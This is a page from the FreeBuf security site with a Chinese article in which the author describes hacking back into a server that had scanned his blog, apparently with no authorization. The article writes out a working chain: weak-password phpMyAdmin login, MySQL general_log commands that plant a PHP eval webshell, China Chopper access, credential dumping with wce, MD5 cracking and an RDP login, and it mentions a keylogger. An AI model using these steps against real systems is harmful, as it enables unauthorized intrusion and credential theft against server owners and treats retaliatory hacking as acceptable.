freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

针对某网站的渗透浅析
蚁景科技 2019-07-08 14:38:39 202662
所属地 湖南省

原创: 冬青 合天智汇

原创投稿活动:重金悬赏 | 合天原创投稿等你来

一天下午,我正在得意洋洋的看着我的博客,发现某个IP正在对我的博客进行扫描,对此,你懂得。 对该IP进行扫描,发现开启了3389,3306,80等端口,初步判断是用phpmyadmin,于是在目录下输入默认phpmyadmin,就进入了很熟悉的界面,在尝试了几个弱口令之后便成功登入。

0YO68cJoWwK

利用phpinfo和登录到界面的信息,可以看到该服务器的相关信息

0YO68lN8R5E

0YO68kJYRWq

第一次在导入一句话的时候因为“secure_file_priv”值为NULL,导致失败,后来转换思路利用日志写入上传成功 利用日志写入可写入一句话木马并用菜刀连接上 首先检测一下mysql全局变量的值 命令:SHOWVARIABLES LIKE"general%"

0YO68kGIL0y

从图可以看出general_log是关闭的,log的存放位置是C:/phpStudy/PHPTutorial/WWW/ 我们所要做的就是开启general_log,然后修改日志的保存位置 命令:setglobal general_log = "ON"; SET globalgeneral_log_file='C:/phpStudy/PHPTutorial/WWW/1.php'

0YO68kaK0n2

0YO68iYB4KG

接下来就是插入一句话木马了 命令:select'<?php eval($_POST[hack]);?>';

0YO68hquu48

最后关闭日志记录 命令:setglobal general_log = "OFF"; 然后利用菜刀进行连接

0YO68jtI7TU

判断用户的权限

0YO68hXijPk

上传wce工具进行密码抓取

0YO68f9kyUC

在相关网站上破解MD5密码

0YO68g0FWxk

拿到账号和密码之后,因为开启了3389,所以直接连

0YO68fxKYwy

大致看了一下连接状态,本来想装一个键盘记录器,最后还是算了,一个小站,而且还是云服务器,没啥多大利用的价值。

0YO68fiSMk4

实操推荐 全面分析中国菜刀及隐藏后门 :了解中国菜刀的特性及其通信原理、机制,并且学会分析可能隐藏的后门以及其工作原理。 长按下面二维码,或点击“实验:全面分析中国菜刀及隐藏后门(合天网安实验室))”,可预览学习(PC端操作最佳哟)

0YO68ftrzyS

声明:作者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关。


# 合天智汇
本文为 蚁景科技 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
渗透测试和实践
蚁景科技 LV.9
湖南蚁景科技有限公司主要从事在线教育平台技术研究及网络培训产品研发,专注网络空间安全实用型人才培养,全面提升用户动手实践能力。
  • 907 文章数
  • 674 关注者
蚁景科技荣膺双项殊荣,引领网络安全教育新潮流
2025-03-28
FlowiseAI 任意文件写入漏洞(CVE-2025–26319)
2025-03-27
路由器安全研究:D-Link DIR-823G v1.02 B05 复现与利用思路
2025-03-18